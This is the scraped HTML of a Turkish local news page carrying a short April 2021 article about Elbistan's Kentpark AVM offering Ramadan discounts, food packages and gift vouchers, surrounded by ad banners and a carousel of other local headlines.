<a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
      <div id="flashaber" data-flash="fh69783" >
	<div class="f-kapsayici">
		<div class="f-baslik">Flaş Haber</div>
		<div class="f-haber">
			<a href="http://www.elbistaninsesi.com/guncel/ambulansla-otomobil-carpisti-olu-ve-yaralilar-var-h69783.html" title="Ambulansla otomobil çarpıştı: ölü ve yaralılar var" target="_blank">Ambulansla otomobil çarpıştı: ölü ve yaralılar var</a>
		</div>
		<span class="glyphicons remove_2 f_kapat"></span>
	</div>
</div>
    </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/polis-haftasi-kutlamalari-basladi-2-h69781.html" title="Polis Haftası kutlamaları başladı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/04/polis-haftası-kutlamaları-1.jpg" alt="Polis Haftası kutlamaları başladı" />
      <div class="caption">Polis Haftası kutlamaları başladı</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/19-mahalledeki-63-tasinmaz-9-milyon-tl-toplam-bedelle-satisa-cikarildi-h69779.html" title="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/04/tarla.jpg" alt="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı" />
      <div class="caption">19 mahalledeki 63 taşınmaz 9...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-12-bin-kumes-hayvani-h69775.html" title="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/04/12-bin-kumes-hayvanı-1.jpg" alt="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı" />
      <div class="caption">Ziraat Odası’ndan çiftçilere 12 bin...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-supheli-tutuklandi-h69774.html" title="Uyuşturucu operasyonunda 2 şüpheli tutuklandı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/04/002.jpg" alt="Uyuşturucu operasyonunda 2 şüpheli tutuklandı" />
      <div class="caption">Uyuşturucu operasyonunda 2 şüpheli tutuklandı</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasa-sehit-atesi-dustu-2-h69773.html" title="Kahramanmaraş’a şehit ateşi düştü" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/04/170572461_3655017957929419_1501581920904676638_n.jpg" alt="Kahramanmaraş’a şehit ateşi düştü" />
      <div class="caption">Kahramanmaraş’a şehit ateşi düştü</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kentpark-980.gif" width="980" height="200" style="width:980px;height: 200px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=80" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor</h1>
                <h2 class="lead" itemprop="description"><strong>Elbistan’ın en büyük alışveriş merkezlerinden olan Elbistan Kentpark AVM, yaklaşan Ramazan ayını indirimlerle karşılıyor.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-04-08 18:05:03" content="2021-04-08T18:05:03+02:00">08 Nisan 2021 Perşembe 18:05</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" alt="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-69777"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/HUNKAR-GİF_1.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;">2008 yılından beri Elbistan ve bölge halkına hizmet veren <strong class="klink">Kentpark AVM</strong>, Ramazan ayı öncesinde kampanyalarına yenilerini ekleyerek devam ediyor.</span></p>

<p><span style="font-size:16px;">‘Ramazan bereketiyle geldi’ sloganıyla Ramazan ayını indirimlerle karşıladıklarını belirten Kentpark AVM yetkilileri yaptıkları açıklamada “Kaliteli ve güler yüzlü hizmet anlayışımızla Elbistan’da 8 şubemizde hizmet veriyoruz. 9-28 Nisan tarihleri arasında Ramazan ayına çok cazip fiyatlar ve özel indirim kampanyalarımız olacak. Ramazan ayına özel hazırlanan gıda paketlerini, tüketicilerin ihtiyaçlarına göre farklı içerik ve fiyat seçenekleriyle satışa sunduk. Ramazan süresince iftar ve sahur sofraları için düşünülerek hazırlanan koliler, temel gıda maddelerinden oluşuyor. Firmaların personeline veya hayırsever vatandaşların ihtiyaç sahiplerine yapacakları yardım ve bağışlar için gıda paketlerimizin yanı sıra alışveriş çeki seçeneğimiz de bulunuyor. İndirimlerden ve kampanyalı ürünlerden yararlanmak için tüm halkımızı mağazalarımıza bekliyoruz” ifadelerine yer verdiler.</span></p><div class="p_ad"></div>

<p></p>

<p></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.elbistaninsesi.com/guncel/ambulansla-otomobil-carpisti-olu-ve-yaralilar-var-h69783.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/19-mahalledeki-63-tasinmaz-9-milyon-tl-toplam-bedelle-satisa-cikarildi-h69779.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmarasa-sehit-atesi-dustu-2-h69773.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/polis-haftasi-kutlamalari-basladi-2-h69781.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobile-motosiklet-carpisti-1-yarali-h69782.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-zor-elbistanda-ziyaretlerde-bulundu-h69780.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ketem-kanserde-erken-teshisin-onemine-dikkat-cekti-h69778.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/akbayir-halkindan-baskan-tirasa-tesekkur-h69776.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-12-bin-kumes-hayvani-h69775.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-supheli-tutuklandi-h69774.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/milimetrik-desenler-sabirli-dokunuslarla-sanata-donusuyor-h69770.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-2-kisinin-mal-varliklari-donduruldu-h69769.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kurak-avina-gecit-yok-h69768.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/sahte-kimlikle-yunanistana-kacarken-yakalandi-h69767.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kosu-grubu-2-maratondan-3-madalya-ile-dondu-h69766.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-sigara-hirsizligi-3-gozalti-h69762.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/orta-caga-ait-sikke-ve-tarihi-eserleri-satmaya-gotururken-yakalandi-h69760.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-osbde-1000-fidan-toprakla-bulusturuldu-h69759.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/prs-belgeden-ucretsiz-myk-belgesi-h69757.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaynarcaya-koruma-bandi-h69756.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-spor-salonunda-incelemelerde-bulundu-h69755.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/hava-kirliligi-3-boyutlu-yazilimla-tespit-edilecek-h69754.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/garanti-bbva-dan-emeklilere-promosyon-firsati-h69753.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/camilerde-teravih-namazi-kilinmayacak-h69751.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.elbistaninsesi.com/guncel/ambulansla-otomobil-carpisti-olu-ve-yaralilar-var-h69783.html" title="Ambulansla otomobil çarpıştı: ölü ve yaralılar var">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/ambulansla_otomobil_carpisti_olu_ve_yaralilar_var_h69783_06456.jpg" alt="Ambulansla otomobil çarpıştı: ölü ve yaralılar var" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ambulansla otomobil çarpıştı: ölü ve yaralılar var</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/19-mahalledeki-63-tasinmaz-9-milyon-tl-toplam-bedelle-satisa-cikarildi-h69779.html" title="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/19_mahalledeki_63_tasinmaz_9_milyon_tl_toplam_bedelle_satisa_cikarildi_h69779_3491c.jpg" alt="19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">19 mahalledeki 63 taşınmaz 9 milyon TL toplam bedelle satışa çıkarıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasa-sehit-atesi-dustu-2-h69773.html" title="Kahramanmaraş’a şehit ateşi düştü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/kahramanmarasa_sehit_atesi_dustu_h69773_55517.jpg" alt="Kahramanmaraş’a şehit ateşi düştü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kahramanmaraş’a şehit ateşi düştü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/polis-haftasi-kutlamalari-basladi-2-h69781.html" title="Polis Haftası kutlamaları başladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/polis_haftasi_kutlamalari_basladi_h69781_241b1.JPG" alt="Polis Haftası kutlamaları başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Polis Haftası kutlamaları başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/otomobile-motosiklet-carpisti-1-yarali-h69782.html" title="Otomobile motosiklet çarpıştı: 1 yaralı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/otomobile_motosiklet_carpisti_1_yarali_h69782_5e36d.jpg" alt="Otomobile motosiklet çarpıştı: 1 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Otomobile motosiklet çarpıştı: 1 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-zor-elbistanda-ziyaretlerde-bulundu-h69780.html" title="Başkan Zor, Elbistan’da ziyaretlerde bulundu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/baskan_zor_elbistanda_ziyaretlerde_bulundu_h69780_553d8.jpg" alt="Başkan Zor, Elbistan’da ziyaretlerde bulundu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Zor, Elbistan’da ziyaretlerde bulundu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ketem-kanserde-erken-teshisin-onemine-dikkat-cekti-h69778.html" title="KETEM, kanserde erken teşhisin önemine dikkat çekti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/ketem_kanserde_erken_teshisin_onemine_dikkat_cekti_h69778_6fd8c.jpg" alt="KETEM, kanserde erken teşhisin önemine dikkat çekti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">KETEM, kanserde erken teşhisin önemine dikkat çekti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html" title="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/kentpark_avm_ramazan_ayini_kampanyalarla_karsiliyor_h69777_2dce8.jpg" alt="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/akbayir-halkindan-baskan-tirasa-tesekkur-h69776.html" title="Akbayır halkından Başkan Tıraş’a teşekkür">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/akbayir_halkindan_baskan_tirasa_tesekkur_h69776_eed0f.jpg" alt="Akbayır halkından Başkan Tıraş’a teşekkür" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Akbayır halkından Başkan Tıraş’a teşekkür</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-12-bin-kumes-hayvani-h69775.html" title="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/ziraat_odasindan_ciftcilere_12_bin_kumes_hayvani_h69775_27c63.JPG" alt="Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ziraat Odası’ndan çiftçilere 12 bin kümes hayvanı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-operasyonunda-2-supheli-tutuklandi-h69774.html" title="Uyuşturucu operasyonunda 2 şüpheli tutuklandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/uyusturucu_operasyonunda_2_supheli_tutuklandi_h69774_221f5.jpg" alt="Uyuşturucu operasyonunda 2 şüpheli tutuklandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Uyuşturucu operasyonunda 2 şüpheli tutuklandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/milimetrik-desenler-sabirli-dokunuslarla-sanata-donusuyor-h69770.html" title="Milimetrik desenler sabırlı dokunuşlarla sanata dönüşüyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/milimetrik_desenler_sabirli_dokunuslarla_sanata_donusuyor_h69770_1bc56.jpg" alt="Milimetrik desenler sabırlı dokunuşlarla sanata dönüşüyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Milimetrik desenler sabırlı dokunuşlarla sanata dönüşüyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanda-2-kisinin-mal-varliklari-donduruldu-h69769.html" title="Elbistan’da 2 kişinin mal varlıkları donduruldu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/elbistanda_2_kisinin_mal_varliklari_donduruldu_h69769_ac66d.jpg" alt="Elbistan’da 2 kişinin mal varlıkları donduruldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’da 2 kişinin mal varlıkları donduruldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kurak-avina-gecit-yok-h69768.html" title="Kurak avına geçit yok">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/kurak_avina_gecit_yok_h69768_9206d.jpg" alt="Kurak avına geçit yok" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kurak avına geçit yok</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/sahte-kimlikle-yunanistana-kacarken-yakalandi-h69767.html" title="Sahte kimlikle Yunanistan’a kaçarken yakalandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/sahte_kimlikle_yunanistana_kacarken_yakalandi_h69767_80812.jpg" alt="Sahte kimlikle Yunanistan’a kaçarken yakalandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Sahte kimlikle Yunanistan’a kaçarken yakalandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kosu-grubu-2-maratondan-3-madalya-ile-dondu-h69766.html" title="Eshab-ı Kehf Koşu Grubu, 2 maratondan 3 madalya ile döndü ">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/eshab_i_kehf_kosu_grubu_2_maratondan_3_madalya_ile_dondu_h69766_4cdb3.jpeg" alt="Eshab-ı Kehf Koşu Grubu, 2 maratondan 3 madalya ile döndü " />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Eshab-ı Kehf Koşu Grubu, 2 maratondan 3 madalya ile döndü </span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanda-sigara-hirsizligi-3-gozalti-h69762.html" title="Elbistan’da sigara hırsızlığı: 3 gözaltı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/elbistanda_sigara_hirsizligi_3_gozalti_h69762_fec6f.jpg" alt="Elbistan’da sigara hırsızlığı: 3 gözaltı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’da sigara hırsızlığı: 3 gözaltı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/orta-caga-ait-sikke-ve-tarihi-eserleri-satmaya-gotururken-yakalandi-h69760.html" title="Orta Çağ’a ait sikke ve tarihi eserleri satmaya götürürken yakalandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/orta_caga_ait_sikke_ve_tarihi_eserleri_satmaya_gotururken_yakalandi_h69760_16bc8.jpg" alt="Orta Çağ’a ait sikke ve tarihi eserleri satmaya götürürken yakalandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Orta Çağ’a ait sikke ve tarihi eserleri satmaya götürürken yakalandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistan-osbde-1000-fidan-toprakla-bulusturuldu-h69759.html" title="Elbistan OSB’de 1000 fidan toprakla buluşturuldu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/elbistan_osbde_1000_fidan_toprakla_bulusturuldu_h69759_0dc4d.jpg" alt="Elbistan OSB’de 1000 fidan toprakla buluşturuldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan OSB’de 1000 fidan toprakla buluşturuldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/prs-belgeden-ucretsiz-myk-belgesi-h69757.html" title="PRS Belge’den ücretsiz MYK Belgesi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/prs_belgeden_myk_belgesi_h69757_0436c.jpg" alt="PRS Belge’den ücretsiz MYK Belgesi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">PRS Belge’den ücretsiz MYK Belgesi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaynarcaya-koruma-bandi-h69756.html" title="Kaynarca’ya koruma bandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/kaynarcaya_koruma_bandi_h69756_19961.jpg" alt="Kaynarca’ya koruma bandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaynarca’ya koruma bandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-spor-salonunda-incelemelerde-bulundu-h69755.html" title="Kaymakam Demir, spor salonunda incelemelerde bulundu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/kaymakam_demir_spor_salonunda_incelemelerde_bulundu_h69755_96ca0.jpg" alt="Kaymakam Demir, spor salonunda incelemelerde bulundu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakam Demir, spor salonunda incelemelerde bulundu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/hava-kirliligi-3-boyutlu-yazilimla-tespit-edilecek-h69754.html" title="Hava kirliliği 3 boyutlu yazılımla tespit edilecek">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/hava_kirliligi_3_boyutlu_yazilimla_tespit_edilecek_h69754_e3590.jpg" alt="Hava kirliliği 3 boyutlu yazılımla tespit edilecek" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hava kirliliği 3 boyutlu yazılımla tespit edilecek</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/garanti-bbva-dan-emeklilere-promosyon-firsati-h69753.html" title="Garanti BBVA&#039;dan emeklilere promosyon fırsatı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/garanti_bbva_dan_emeklilere_promosyon_firsati_h69753_1886e.JPG" alt="Garanti BBVA&#039;dan emeklilere promosyon fırsatı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Garanti BBVA&#039;dan emeklilere promosyon fırsatı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/camilerde-teravih-namazi-kilinmayacak-h69751.html" title="Camilerde teravih namazı kılınmayacak">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/04/camilerde_teravih_namazi_kilinmayacak_h69751_59ef2.JPG" alt="Camilerde teravih namazı kılınmayacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Camilerde teravih namazı kılınmayacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

